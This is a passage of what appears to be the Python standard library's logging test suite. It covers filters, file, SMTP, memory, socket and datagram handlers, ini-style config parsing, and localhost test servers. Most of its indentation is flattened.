('Taciturn', '9'),
('Silent', '10'),
]
self.assert_log_lines(first_lines)
specific_filter = VerySpecificFilter()
self.root_logger.addFilter(specific_filter)
self.log_at_all_levels(self.root_logger)
self.assert_log_lines(first_lines + [
# Not only 'Garrulous' is still missing, but also 'Sociable'
# and 'Taciturn'
('Boring', '11'),
('Chatterbox', '12'),
('Talkative', '14'),
('Verbose', '15'),
('Effusive', '17'),
('Terse', '18'),
('Silent', '20'),
])
finally:
if specific_filter:
self.root_logger.removeFilter(specific_filter)
handler.removeFilter(garr)
class HandlerTest(BaseTest):
def test_name(self):
h = logging.Handler()
h.name = 'generic'
self.assertEqual(h.name, 'generic')
h.name = 'anothergeneric'
self.assertEqual(h.name, 'anothergeneric')
self.assertRaises(NotImplementedError, h.emit, None)
def test_builtin_handlers(self):
# We can't actually *use* too many handlers in the tests,
# but we can try instantiating them with various options
if sys.platform in ('linux', 'darwin'):
for existing in (True, False):
fd, fn = tempfile.mkstemp()
os.close(fd)
if not existing:
os.unlink(fn)
h = logging.handlers.WatchedFileHandler(fn, delay=True)
if existing:
dev, ino = h.dev, h.ino
self.assertEqual(dev, -1)
self.assertEqual(ino, -1)
r = logging.makeLogRecord({'msg': 'Test'})
h.handle(r)
# Now remove the file.
os.unlink(fn)
self.assertFalse(os.path.exists(fn))
# The next call should recreate the file.
h.handle(r)
self.assertTrue(os.path.exists(fn))
else:
self.assertEqual(h.dev, -1)
self.assertEqual(h.ino, -1)
h.close()
if existing:
os.unlink(fn)
if sys.platform == 'darwin':
sockname = '/var/run/syslog'
else:
sockname = '/dev/log'
try:
h = logging.handlers.SysLogHandler(sockname)
self.assertEqual(h.facility, h.LOG_USER)
self.assertTrue(h.unixsocket)
h.close()
except OSError: # syslogd might not be available
pass
for method in ('GET', 'POST', 'PUT'):
if method == 'PUT':
self.assertRaises(ValueError, logging.handlers.HTTPHandler,
'localhost', '/log', method)
else:
h = logging.handlers.HTTPHandler('localhost', '/log', method)
h.close()
h = logging.handlers.BufferingHandler(0)
r = logging.makeLogRecord({})
self.assertTrue(h.shouldFlush(r))
h.close()
h = logging.handlers.BufferingHandler(1)
self.assertFalse(h.shouldFlush(r))
h.close()
def test_path_objects(self):
"""
Test that Path objects are accepted as filename arguments to handlers.
See Issue #27493.
"""
fd, fn = tempfile.mkstemp()
os.close(fd)
os.unlink(fn)
pfn = pathlib.Path(fn)
cases = (
(logging.FileHandler, (pfn, 'w')),
(logging.handlers.RotatingFileHandler, (pfn, 'a')),
(logging.handlers.TimedRotatingFileHandler, (pfn, 'h')),
)
if sys.platform in ('linux', 'darwin'):
cases += ((logging.handlers.WatchedFileHandler, (pfn, 'w')),)
for cls, args in cases:
h = cls(*args)
self.assertTrue(os.path.exists(fn))
h.close()
os.unlink(fn)
@unittest.skipIf(os.name == 'nt', 'WatchedFileHandler not appropriate for Windows.')
def test_race(self):
# Issue #14632 refers.
def remove_loop(fname, tries):
for _ in range(tries):
try:
os.unlink(fname)
self.deletion_time = time.time()
except OSError:
pass
time.sleep(0.004 * random.randint(0, 4))
del_count = 500
log_count = 500
self.handle_time = None
self.deletion_time = None
for delay in (False, True):
fd, fn = tempfile.mkstemp('.log', 'test_logging-3-')
os.close(fd)
remover = threading.Thread(target=remove_loop, args=(fn, del_count))
remover.daemon = True
remover.start()
h = logging.handlers.WatchedFileHandler(fn, delay=delay)
f = logging.Formatter('%(asctime)s: %(levelname)s: %(message)s')
h.setFormatter(f)
try:
for _ in range(log_count):
time.sleep(0.005)
r = logging.makeLogRecord({'msg': 'testing' })
try:
self.handle_time = time.time()
h.handle(r)
except Exception:
print('Deleted at %s, '
'opened at %s' % (self.deletion_time,
self.handle_time))
raise
finally:
remover.join()
h.close()
if os.path.exists(fn):
os.unlink(fn)
# The implementation relies on os.register_at_fork existing, but we test
# based on os.fork existing because that is what users and this test use.
# This helps ensure that when fork exists (the important concept) that the
# register_at_fork mechanism is also present and used.
@unittest.skipIf(not hasattr(os, 'fork'), 'Test requires os.fork().')
def test_post_fork_child_no_deadlock(self):
"""Ensure child logging locks are not held; bpo-6721 & bpo-36533."""
class _OurHandler(logging.Handler):
def __init__(self):
super().__init__()
self.sub_handler = logging.StreamHandler(
stream=open('/dev/null', 'wt'))
def emit(self, record):
self.sub_handler.acquire()
try:
self.sub_handler.emit(record)
finally:
self.sub_handler.release()
self.assertEqual(len(logging._handlers), 0)
refed_h = _OurHandler()
self.addCleanup(refed_h.sub_handler.stream.close)
refed_h.name = 'because we need at least one for this test'
self.assertGreater(len(logging._handlers), 0)
self.assertGreater(len(logging._at_fork_reinit_lock_weakset), 1)
test_logger = logging.getLogger('test_post_fork_child_no_deadlock')
test_logger.addHandler(refed_h)
test_logger.setLevel(logging.DEBUG)
locks_held__ready_to_fork = threading.Event()
fork_happened__release_locks_and_end_thread = threading.Event()
def lock_holder_thread_fn():
logging._acquireLock()
try:
refed_h.acquire()
try:
# Tell the main thread to do the fork.
locks_held__ready_to_fork.set()
# If the deadlock bug exists, the fork will happen
# without dealing with the locks we hold, deadlocking
# the child.
# Wait for a successful fork or an unreasonable amount of
# time before releasing our locks. To avoid a timing based
# test we'd need communication from os.fork() as to when it
# has actually happened. Given this is a regression test
# for a fixed issue, potentially less reliably detecting
# regression via timing is acceptable for simplicity.
# The test will always take at least this long. :(
fork_happened__release_locks_and_end_thread.wait(0.5)
finally:
refed_h.release()
finally:
logging._releaseLock()
lock_holder_thread = threading.Thread(
target=lock_holder_thread_fn,
name='test_post_fork_child_no_deadlock lock holder')
lock_holder_thread.start()
locks_held__ready_to_fork.wait()
pid = os.fork()
if pid == 0: # Child.
try:
test_logger.info(r'Child process did not deadlock. \o/')
finally:
os._exit(0)
else: # Parent.
test_logger.info(r'Parent process returned from fork. \o/')
fork_happened__release_locks_and_end_thread.set()
lock_holder_thread.join()
start_time = time.monotonic()
while True:
test_logger.debug('Waiting for child process.')
waited_pid, status = os.waitpid(pid, os.WNOHANG)
if waited_pid == pid:
break # child process exited.
if time.monotonic() - start_time > 7:
break # so long? implies child deadlock.
time.sleep(0.05)
test_logger.debug('Done waiting.')
if waited_pid != pid:
os.kill(pid, signal.SIGKILL)
waited_pid, status = os.waitpid(pid, 0)
self.fail("child process deadlocked.")
self.assertEqual(status, 0, msg="child process error")
class BadStream(object):
def write(self, data):
raise RuntimeError('deliberate mistake')
class TestStreamHandler(logging.StreamHandler):
def handleError(self, record):
self.error_record = record
class StreamWithIntName(object):
level = logging.NOTSET
name = 2
class StreamHandlerTest(BaseTest):
def test_error_handling(self):
h = TestStreamHandler(BadStream())
r = logging.makeLogRecord({})
old_raise = logging.raiseExceptions
try:
h.handle(r)
self.assertIs(h.error_record, r)
h = logging.StreamHandler(BadStream())
with support.captured_stderr() as stderr:
h.handle(r)
msg = '\nRuntimeError: deliberate mistake\n'
self.assertIn(msg, stderr.getvalue())
logging.raiseExceptions = False
with support.captured_stderr() as stderr:
h.handle(r)
self.assertEqual('', stderr.getvalue())
finally:
logging.raiseExceptions = old_raise
def test_stream_setting(self):
"""
Test setting the handler's stream
"""
h = logging.StreamHandler()
stream = io.StringIO()
old = h.setStream(stream)
self.assertIs(old, sys.stderr)
actual = h.setStream(old)
self.assertIs(actual, stream)
# test that setting to existing value returns None
actual = h.setStream(old)
self.assertIsNone(actual)
def test_can_represent_stream_with_int_name(self):
h = logging.StreamHandler(StreamWithIntName())
self.assertEqual(repr(h), '<StreamHandler 2 (NOTSET)>')
# -- The following section could be moved into a server_helper.py module
# -- if it proves to be of wider utility than just test_logging
class TestSMTPServer(smtpd.SMTPServer):
"""
This class implements a test SMTP server.
:param addr: A (host, port) tuple which the server listens on.
You can specify a port value of zero: the server's
*port* attribute will hold the actual port number
used, which can be used in client connections.
:param handler: A callable which will be called to process
incoming messages. The handler will be passed
the client address tuple, who the message is from,
a list of recipients and the message data.
:param poll_interval: The interval, in seconds, used in the underlying
:func:`select` or :func:`poll` call by
:func:`asyncore.loop`.
:param sockmap: A dictionary which will be used to hold
:class:`asyncore.dispatcher` instances used by
:func:`asyncore.loop`. This avoids changing the
:mod:`asyncore` module's global state.
"""
def __init__(self, addr, handler, poll_interval, sockmap):
smtpd.SMTPServer.__init__(self, addr, None, map=sockmap,
decode_data=True)
self.port = self.socket.getsockname()[1]
self._handler = handler
self._thread = None
self.poll_interval = poll_interval
def process_message(self, peer, mailfrom, rcpttos, data):
"""
Delegates to the handler passed in to the server's constructor.
Typically, this will be a test case method.
:param peer: The client (host, port) tuple.
:param mailfrom: The address of the sender.
:param rcpttos: The addresses of the recipients.
:param data: The message.
"""
self._handler(peer, mailfrom, rcpttos, data)
def start(self):
"""
Start the server running on a separate daemon thread.
"""
self._thread = t = threading.Thread(target=self.serve_forever,
args=(self.poll_interval,))
        t.daemon = True
t.start()
def serve_forever(self, poll_interval):
"""
Run the :mod:`asyncore` loop until normal termination
conditions arise.
:param poll_interval: The interval, in seconds, used in the underlying
:func:`select` or :func:`poll` call by
:func:`asyncore.loop`.
"""
asyncore.loop(poll_interval, map=self._map)
def stop(self, timeout=None):
"""
Stop the thread by closing the server instance.
Wait for the server thread to terminate.
:param timeout: How long to wait for the server thread
to terminate.
"""
self.close()
support.join_thread(self._thread, timeout)
self._thread = None
asyncore.close_all(map=self._map, ignore_all=True)
class ControlMixin(object):
"""
This mixin is used to start a server on a separate thread, and
shut it down programmatically. Request handling is simplified - instead
of needing to derive a suitable RequestHandler subclass, you just
provide a callable which will be passed each received request to be
processed.
:param handler: A handler callable which will be called with a
single parameter - the request - in order to
process the request. This handler is called on the
server thread, effectively meaning that requests are
processed serially. While not quite Web scale ;-),
this should be fine for testing applications.
:param poll_interval: The polling interval in seconds.
"""
def __init__(self, handler, poll_interval):
self._thread = None
self.poll_interval = poll_interval
self._handler = handler
self.ready = threading.Event()
def start(self):
"""
Create a daemon thread to run the server, and start it.
"""
self._thread = t = threading.Thread(target=self.serve_forever,
args=(self.poll_interval,))
        t.daemon = True
t.start()
def serve_forever(self, poll_interval):
"""
Run the server. Set the ready flag before entering the
service loop.
"""
self.ready.set()
super(ControlMixin, self).serve_forever(poll_interval)
def stop(self, timeout=None):
"""
Tell the server thread to stop, and wait for it to do so.
:param timeout: How long to wait for the server thread
to terminate.
"""
self.shutdown()
if self._thread is not None:
support.join_thread(self._thread, timeout)
self._thread = None
self.server_close()
self.ready.clear()
class TestHTTPServer(ControlMixin, HTTPServer):
"""
An HTTP server which is controllable using :class:`ControlMixin`.
:param addr: A tuple with the IP address and port to listen on.
:param handler: A handler callable which will be called with a
single parameter - the request - in order to
process the request.
:param poll_interval: The polling interval in seconds.
:param log: Pass ``True`` to enable log messages.
"""
def __init__(self, addr, handler, poll_interval=0.5,
log=False, sslctx=None):
class DelegatingHTTPRequestHandler(BaseHTTPRequestHandler):
def __getattr__(self, name, default=None):
if name.startswith('do_'):
return self.process_request
raise AttributeError(name)
def process_request(self):
self.server._handler(self)
def log_message(self, format, *args):
if log:
super(DelegatingHTTPRequestHandler,
self).log_message(format, *args)
HTTPServer.__init__(self, addr, DelegatingHTTPRequestHandler)
ControlMixin.__init__(self, handler, poll_interval)
self.sslctx = sslctx
def get_request(self):
try:
sock, addr = self.socket.accept()
if self.sslctx:
sock = self.sslctx.wrap_socket(sock, server_side=True)
except OSError as e:
# socket errors are silenced by the caller, print them here
sys.stderr.write("Got an error:\n%s\n" % e)
raise
return sock, addr
class TestTCPServer(ControlMixin, ThreadingTCPServer):
"""
A TCP server which is controllable using :class:`ControlMixin`.
:param addr: A tuple with the IP address and port to listen on.
:param handler: A handler callable which will be called with a single
parameter - the request - in order to process the request.
:param poll_interval: The polling interval in seconds.
:bind_and_activate: If True (the default), binds the server and starts it
listening. If False, you need to call
:meth:`server_bind` and :meth:`server_activate` at
some later time before calling :meth:`start`, so that
the server will set up the socket and listen on it.
"""
allow_reuse_address = True
def __init__(self, addr, handler, poll_interval=0.5,
bind_and_activate=True):
class DelegatingTCPRequestHandler(StreamRequestHandler):
def handle(self):
self.server._handler(self)
ThreadingTCPServer.__init__(self, addr, DelegatingTCPRequestHandler,
bind_and_activate)
ControlMixin.__init__(self, handler, poll_interval)
def server_bind(self):
super(TestTCPServer, self).server_bind()
self.port = self.socket.getsockname()[1]
class TestUDPServer(ControlMixin, ThreadingUDPServer):
"""
A UDP server which is controllable using :class:`ControlMixin`.
:param addr: A tuple with the IP address and port to listen on.
:param handler: A handler callable which will be called with a
single parameter - the request - in order to
process the request.
:param poll_interval: The polling interval for shutdown requests,
in seconds.
:bind_and_activate: If True (the default), binds the server and
starts it listening. If False, you need to
call :meth:`server_bind` and
:meth:`server_activate` at some later time
before calling :meth:`start`, so that the server will
set up the socket and listen on it.
"""
def __init__(self, addr, handler, poll_interval=0.5,
bind_and_activate=True):
class DelegatingUDPRequestHandler(DatagramRequestHandler):
def handle(self):
self.server._handler(self)
def finish(self):
data = self.wfile.getvalue()
if data:
try:
super(DelegatingUDPRequestHandler, self).finish()
except OSError:
if not self.server._closed:
raise
ThreadingUDPServer.__init__(self, addr,
DelegatingUDPRequestHandler,
bind_and_activate)
ControlMixin.__init__(self, handler, poll_interval)
self._closed = False
def server_bind(self):
super(TestUDPServer, self).server_bind()
self.port = self.socket.getsockname()[1]
def server_close(self):
super(TestUDPServer, self).server_close()
self._closed = True
if hasattr(socket, "AF_UNIX"):
class TestUnixStreamServer(TestTCPServer):
address_family = socket.AF_UNIX
class TestUnixDatagramServer(TestUDPServer):
address_family = socket.AF_UNIX
# - end of server_helper section
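# A minimal usage sketch for the server helpers above (illustrative only; the
# handler body and the connecting client are assumptions, not part of the suite):
def _demo_tcp_server_usage():
    received = []
    def handler(request):
        # Called on the server thread for each request; 'request' is the
        # DelegatingTCPRequestHandler instance created inside TestTCPServer.
        received.append(request.rfile.readline())
    server = TestTCPServer(('localhost', 0), handler, poll_interval=0.1)
    server.start()
    server.ready.wait()   # set once serve_forever() is running
    # A client would now connect to ('localhost', server.port) and send data.
    server.stop(2.0)      # shut down and join the server thread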
class SMTPHandlerTest(BaseTest):
# bpo-14314, bpo-19665, bpo-34092: don't wait forever, timeout of 1 minute
TIMEOUT = 60.0
def test_basic(self):
sockmap = {}
server = TestSMTPServer((support.HOST, 0), self.process_message, 0.001,
sockmap)
server.start()
addr = (support.HOST, server.port)
h = logging.handlers.SMTPHandler(addr, 'me', 'you', 'Log',
timeout=self.TIMEOUT)
self.assertEqual(h.toaddrs, ['you'])
self.messages = []
r = logging.makeLogRecord({'msg': 'Hello \u2713'})
self.handled = threading.Event()
h.handle(r)
self.handled.wait(self.TIMEOUT)
server.stop()
self.assertTrue(self.handled.is_set())
self.assertEqual(len(self.messages), 1)
peer, mailfrom, rcpttos, data = self.messages[0]
self.assertEqual(mailfrom, 'me')
self.assertEqual(rcpttos, ['you'])
self.assertIn('\nSubject: Log\n', data)
self.assertTrue(data.endswith('\n\nHello \u2713'))
h.close()
def process_message(self, *args):
self.messages.append(args)
self.handled.set()
class MemoryHandlerTest(BaseTest):
"""Tests for the MemoryHandler."""
# Do not bother with a logger name group.
expected_log_pat = r"^[\w.]+ -> (\w+): (\d+)$"
def setUp(self):
BaseTest.setUp(self)
self.mem_hdlr = logging.handlers.MemoryHandler(10, logging.WARNING,
self.root_hdlr)
self.mem_logger = logging.getLogger('mem')
self.mem_logger.propagate = 0
self.mem_logger.addHandler(self.mem_hdlr)
def tearDown(self):
self.mem_hdlr.close()
BaseTest.tearDown(self)
def test_flush(self):
# The memory handler flushes to its target handler based on specific
# criteria (message count and message level).
self.mem_logger.debug(self.next_message())
self.assert_log_lines([])
self.mem_logger.info(self.next_message())
self.assert_log_lines([])
# This will flush because the level is >= logging.WARNING
self.mem_logger.warning(self.next_message())
lines = [
('DEBUG', '1'),
('INFO', '2'),
('WARNING', '3'),
]
self.assert_log_lines(lines)
for n in (4, 14):
for i in range(9):
self.mem_logger.debug(self.next_message())
self.assert_log_lines(lines)
# This will flush because it's the 10th message since the last
# flush.
self.mem_logger.debug(self.next_message())
lines = lines + [('DEBUG', str(i)) for i in range(n, n + 10)]
self.assert_log_lines(lines)
self.mem_logger.debug(self.next_message())
self.assert_log_lines(lines)
def test_flush_on_close(self):
"""
Test that the flush-on-close configuration works as expected.
"""
self.mem_logger.debug(self.next_message())
self.assert_log_lines([])
self.mem_logger.info(self.next_message())
self.assert_log_lines([])
self.mem_logger.removeHandler(self.mem_hdlr)
# Default behaviour is to flush on close. Check that it happens.
self.mem_hdlr.close()
lines = [
('DEBUG', '1'),
('INFO', '2'),
]
self.assert_log_lines(lines)
# Now configure for flushing not to be done on close.
self.mem_hdlr = logging.handlers.MemoryHandler(10, logging.WARNING,
self.root_hdlr,
False)
self.mem_logger.addHandler(self.mem_hdlr)
self.mem_logger.debug(self.next_message())
self.assert_log_lines(lines) # no change
self.mem_logger.info(self.next_message())
self.assert_log_lines(lines) # no change
self.mem_logger.removeHandler(self.mem_hdlr)
self.mem_hdlr.close()
# assert that no new lines have been added
self.assert_log_lines(lines) # no change
class ExceptionFormatter(logging.Formatter):
"""A special exception formatter."""
def formatException(self, ei):
return "Got a [%s]" % ei[0].__name__
class ConfigFileTest(BaseTest):
"""Reading logging config from a .ini-style config file."""
check_no_resource_warning = support.check_no_resource_warning
expected_log_pat = r"^(\w+) \+\+ (\w+)$"
# config0 is a standard configuration.
config0 = """
[loggers]
keys=root
[handlers]
keys=hand1
[formatters]
keys=form1
[logger_root]
level=WARNING
handlers=hand1
[handler_hand1]
class=StreamHandler
level=NOTSET
formatter=form1
args=(sys.stdout,)
[formatter_form1]
format=%(levelname)s ++ %(message)s
datefmt=
"""
# config1 adds a little to the standard configuration.
config1 = """
[loggers]
keys=root,parser
[handlers]
keys=hand1
[formatters]
keys=form1
[logger_root]
level=WARNING
handlers=
[logger_parser]
level=DEBUG
handlers=hand1
propagate=1
qualname=compiler.parser
[handler_hand1]
class=StreamHandler
level=NOTSET
formatter=form1
args=(sys.stdout,)
[formatter_form1]
format=%(levelname)s ++ %(message)s
datefmt=
"""
# config1a moves the handler to the root.
config1a = """
[loggers]
keys=root,parser
[handlers]
keys=hand1
[formatters]
keys=form1
[logger_root]
level=WARNING
handlers=hand1
[logger_parser]
level=DEBUG
handlers=
propagate=1
qualname=compiler.parser
[handler_hand1]
class=StreamHandler
level=NOTSET
formatter=form1
args=(sys.stdout,)
[formatter_form1]
format=%(levelname)s ++ %(message)s
datefmt=
"""
# config2 has a subtle configuration error that should be reported
config2 = config1.replace("sys.stdout", "sys.stbout")
# config3 has a less subtle configuration error
config3 = config1.replace("formatter=form1", "formatter=misspelled_name")
# config4 specifies a custom formatter class to be loaded
config4 = """
[loggers]
keys=root
[handlers]
keys=hand1
[formatters]
keys=form1
[logger_root]
level=NOTSET
handlers=hand1
[handler_hand1]
class=StreamHandler
level=NOTSET
formatter=form1
args=(sys.stdout,)
[formatter_form1]
class=""" + __name__ + """.ExceptionFormatter
format=%(levelname)s:%(name)s:%(message)s
datefmt=
"""
# config5 specifies a custom handler class to be loaded
config5 = config1.replace('class=StreamHandler', 'class=logging.StreamHandler')
# config6 uses ', ' delimiters in the handlers and formatters sections
config6 = """
[loggers]
keys=root,parser
[handlers]
keys=hand1, hand2
[formatters]
keys=form1, form2
[logger_root]
level=WARNING
handlers=
[logger_parser]
level=DEBUG
handlers=hand1
propagate=1
qualname=compiler.parser
[handler_hand1]
class=StreamHandler
level=NOTSET
formatter=form1
args=(sys.stdout,)
[handler_hand2]
class=StreamHandler
level=NOTSET
formatter=form1
args=(sys.stderr,)
[formatter_form1]
format=%(levelname)s ++ %(message)s
datefmt=
[formatter_form2]
format=%(message)s
datefmt=
"""
# config7 adds a compiler logger, and uses kwargs instead of args.
config7 = """
[loggers]
keys=root,parser,compiler
[handlers]
keys=hand1
[formatters]
keys=form1
[logger_root]
level=WARNING
handlers=hand1
[logger_compiler]
level=DEBUG
handlers=
propagate=1
qualname=compiler
[logger_parser]
level=DEBUG
handlers=
propagate=1
qualname=compiler.parser
[handler_hand1]
class=StreamHandler
level=NOTSET
formatter=form1
kwargs={'stream': sys.stdout,}
[formatter_form1]
format=%(levelname)s ++ %(message)s
datefmt=
"""
# config 8, check for resource warning
config8 = r"""
[loggers]
keys=root
[handlers]
keys=file
[formatters]
keys=
[logger_root]
level=DEBUG
handlers=file
[handler_file]
class=FileHandler
level=DEBUG
args=("{tempfile}",)
"""
disable_test = """
[loggers]
keys=root
[handlers]
keys=screen
[formatters]
keys=
[logger_root]
level=DEBUG
handlers=screen
[handler_screen]
level=DEBUG
class=StreamHandler
args=(sys.stdout,)
formatter=
"""
def apply_config(self, conf, **kwargs):
file = io.StringIO(textwrap.dedent(conf))
logging.config.fileConfig(file, **kwargs)
def test_config0_ok(self):
# A simple config file which overrides the default settings.
with support.captured_stdout() as output:
self.apply_config(self.config0)
logger = logging.getLogger()
# Won't output anything
logger.info(self.next_message())
# Outputs a message
logger.error(self.next_message())
self.assert_log_lines([
('ERROR', '2'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
def test_config0_using_cp_ok(self):
# A simple config file which overrides the default settings.
with support.captured_stdout() as output:
file = io.StringIO(textwrap.dedent(self.config0))
cp = configparser.ConfigParser()
cp.read_file(file)
logging.config.fileConfig(cp)
logger = logging.getLogger()
# Won't output anything
logger.info(self.next_message())
# Outputs a message
logger.error(self.next_message())
self.assert_log_lines([
('ERROR', '2'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
def test_config1_ok(self, config=config1):
# A config file defining a sub-parser as well.
with support.captured_stdout() as output:
self.apply_config(config)
logger = logging.getLogger("compiler.parser")
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
self.assert_log_lines([
('INFO', '1'),
('ERROR', '2'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
def test_config2_failure(self):
# A simple config file which overrides the default settings.
self.assertRaises(Exception, self.apply_config, self.config2)
def test_config3_failure(self):
# A simple config file which overrides the default settings.
self.assertRaises(Exception, self.apply_config, self.config3)
def test_config4_ok(self):
# A config file specifying a custom formatter class.
with support.captured_stdout() as output:
self.apply_config(self.config4)
logger = logging.getLogger()
try:
raise RuntimeError()
except RuntimeError:
logging.exception("just testing")
sys.stdout.seek(0)
self.assertEqual(output.getvalue(),
"ERROR:root:just testing\nGot a [RuntimeError]\n")
# Original logger output is empty
self.assert_log_lines([])
def test_config5_ok(self):
self.test_config1_ok(config=self.config5)
def test_config6_ok(self):
self.test_config1_ok(config=self.config6)
def test_config7_ok(self):
with support.captured_stdout() as output:
self.apply_config(self.config1a)
logger = logging.getLogger("compiler.parser")
# See issue #11424. compiler-hyphenated sorts
# between compiler and compiler.xyz and this
# was preventing compiler.xyz from being included
# in the child loggers of compiler because of an
# overzealous loop termination condition.
hyphenated = logging.getLogger('compiler-hyphenated')
# All will output a message
logger.info(self.next_message())
logger.error(self.next_message())
hyphenated.critical(self.next_message())
self.assert_log_lines([
('INFO', '1'),
('ERROR', '2'),
('CRITICAL', '3'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
with support.captured_stdout() as output:
self.apply_config(self.config7)
logger = logging.getLogger("compiler.parser")
self.assertFalse(logger.disabled)
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
logger = logging.getLogger("compiler.lexer")
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
# Will not appear
hyphenated.critical(self.next_message())
self.assert_log_lines([
('INFO', '4'),
('ERROR', '5'),
('INFO', '6'),
('ERROR', '7'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
def test_config8_ok(self):
def cleanup(h1, fn):
h1.close()
os.remove(fn)
with self.check_no_resource_warning():
fd, fn = tempfile.mkstemp(".log", "test_logging-X-")
os.close(fd)
# Replace single backslash with double backslash in windows
# to avoid unicode error during string formatting
if os.name == "nt":
fn = fn.replace("\\", "\\\\")
config8 = self.config8.format(tempfile=fn)
self.apply_config(config8)
self.apply_config(config8)
handler = logging.root.handlers[0]
self.addCleanup(cleanup, handler, fn)
def test_logger_disabling(self):
self.apply_config(self.disable_test)
logger = logging.getLogger('some_pristine_logger')
self.assertFalse(logger.disabled)
self.apply_config(self.disable_test)
self.assertTrue(logger.disabled)
self.apply_config(self.disable_test, disable_existing_loggers=False)
self.assertFalse(logger.disabled)
def test_config_set_handler_names(self):
test_config = """
[loggers]
keys=root
[handlers]
keys=hand1
[formatters]
keys=form1
[logger_root]
handlers=hand1
[handler_hand1]
class=StreamHandler
formatter=form1
[formatter_form1]
format=%(levelname)s ++ %(message)s
"""
self.apply_config(test_config)
        self.assertEqual(logging.getLogger().handlers[0].name, 'hand1')
def test_defaults_do_no_interpolation(self):
"""bpo-33802 defaults should not get interpolated"""
ini = textwrap.dedent("""
[formatters]
keys=default
[formatter_default]
[handlers]
keys=console
[handler_console]
class=logging.StreamHandler
args=tuple()
[loggers]
keys=root
[logger_root]
formatter=default
handlers=console
""").strip()
fd, fn = tempfile.mkstemp(prefix='test_logging_', suffix='.ini')
try:
os.write(fd, ini.encode('ascii'))
os.close(fd)
logging.config.fileConfig(
fn,
defaults=dict(
version=1,
disable_existing_loggers=False,
formatters={
"generic": {
"format": "%(asctime)s [%(process)d] [%(levelname)s] %(message)s",
"datefmt": "[%Y-%m-%d %H:%M:%S %z]",
"class": "logging.Formatter"
},
},
)
)
finally:
os.unlink(fn)
class SocketHandlerTest(BaseTest):
"""Test for SocketHandler objects."""
server_class = TestTCPServer
address = ('localhost', 0)
def setUp(self):
"""Set up a TCP server to receive log messages, and a SocketHandler
pointing to that server's address and port."""
BaseTest.setUp(self)
# Issue #29177: deal with errors that happen during setup
self.server = self.sock_hdlr = self.server_exception = None
try:
self.server = server = self.server_class(self.address,
self.handle_socket, 0.01)
server.start()
# Uncomment next line to test error recovery in setUp()
# raise OSError('dummy error raised')
except OSError as e:
self.server_exception = e
return
server.ready.wait()
hcls = logging.handlers.SocketHandler
if isinstance(server.server_address, tuple):
self.sock_hdlr = hcls('localhost', server.port)
else:
self.sock_hdlr = hcls(server.server_address, None)
self.log_output = ''
self.root_logger.removeHandler(self.root_logger.handlers[0])
self.root_logger.addHandler(self.sock_hdlr)
self.handled = threading.Semaphore(0)
def tearDown(self):
"""Shutdown the TCP server."""
try:
if self.sock_hdlr:
self.root_logger.removeHandler(self.sock_hdlr)
self.sock_hdlr.close()
if self.server:
self.server.stop(2.0)
finally:
BaseTest.tearDown(self)
def handle_socket(self, request):
conn = request.connection
while True:
chunk = conn.recv(4)
if len(chunk) < 4:
break
slen = struct.unpack(">L", chunk)[0]
chunk = conn.recv(slen)
while len(chunk) < slen:
chunk = chunk + conn.recv(slen - len(chunk))
obj = pickle.loads(chunk)
record = logging.makeLogRecord(obj)
self.log_output += record.msg + '\n'
self.handled.release()
def test_output(self):
# The log message sent to the SocketHandler is properly received.
if self.server_exception:
self.skipTest(self.server_exception)
logger = logging.getLogger("tcp")
logger.error("spam")
self.handled.acquire()
logger.debug("eggs")
self.handled.acquire()
self.assertEqual(self.log_output, "spam\neggs\n")
def test_noserver(self):
if self.server_exception:
self.skipTest(self.server_exception)
# Avoid timing-related failures due to SocketHandler's own hard-wired
# one-second timeout on socket.create_connection() (issue #16264).
self.sock_hdlr.retryStart = 2.5
# Kill the server
self.server.stop(2.0)
# The logging call should try to connect, which should fail
try:
raise RuntimeError('Deliberate mistake')
except RuntimeError:
self.root_logger.exception('Never sent')
self.root_logger.error('Never sent, either')
now = time.time()
self.assertGreater(self.sock_hdlr.retryTime, now)
time.sleep(self.sock_hdlr.retryTime - now + 0.001)
self.root_logger.error('Nor this')
def _get_temp_domain_socket():
fd, fn = tempfile.mkstemp(prefix='test_logging_', suffix='.sock')
os.close(fd)
# just need a name - file can't be present, or we'll get an
# 'address already in use' error.
os.remove(fn)
return fn
@unittest.skipUnless(hasattr(socket, "AF_UNIX"), "Unix sockets required")
class UnixSocketHandlerTest(SocketHandlerTest):
"""Test for SocketHandler with unix sockets."""
if hasattr(socket, "AF_UNIX"):
server_class = TestUnixStreamServer
def setUp(self):
# override the definition in the base class
self.address = _get_temp_domain_socket()
SocketHandlerTest.setUp(self)
def tearDown(self):
SocketHandlerTest.tearDown(self)
support.unlink(self.address)
class DatagramHandlerTest(BaseTest):
"""Test for DatagramHandler."""
server_class = TestUDPServer
address = ('localhost', 0)
def setUp(self):
"""Set up a UDP server to receive log messages, and a DatagramHandler
pointing to that server's address and port."""
BaseTest.setUp(self)
# Issue #29177: deal with errors that happen during setup
self.server = self.sock_hdlr = self.server_exception = None
try:
self.server = server = self.server_class(self.address,
self.handle_datagram, 0.01)
server.start()
# Uncomment next line to test error recovery in setUp()
# raise OSError('dummy error raised')
except OSError as e:
self.server_exception = e
return
server.ready.wait()
hcls = logging.handlers.DatagramHandler
if isinstance(server.server_address, tuple):
self.sock_hdlr = hcls('localhost', server.port)
else:
self.sock_hdlr = hcls(server.server_address, None)
self.log_output = ''
self.root_logger.removeHandler(self.root_logger.handlers[0])
self.root_logger.addHandler(self.sock_hdlr)
self.handled = threading.Event()
def tearDown(self):
"""Shutdown the UDP server."""
try:
if self.server:
self.server.stop(2.0)
if self.sock_hdlr:
self.root_logger.removeHandler(self.sock_hdlr)
self.sock_hdlr.close()
finally:
BaseTest.tearDown(self)
def handle_datagram(self, request):
slen = struct.pack('>L', 0) # length of prefix
packet = request.packet[len(slen):]
obj = pickle.loads(packet)
record = logging.makeLogRecord(obj)
self.log_output += record.msg + '\n'
self.handled.set()
def test_output(self):
# The log message sent to the DatagramHandler is properly received.
if self.server_exception:
self.skipTest(self.server_exception)
logger = logging.getLogger("udp")
logger.error("spam")
self.handled.wait()
self.handled.clear()
logger.error("eggs")
self.handled.wait()
self.assertEqual(self.log_output, "spam\neggs\n")
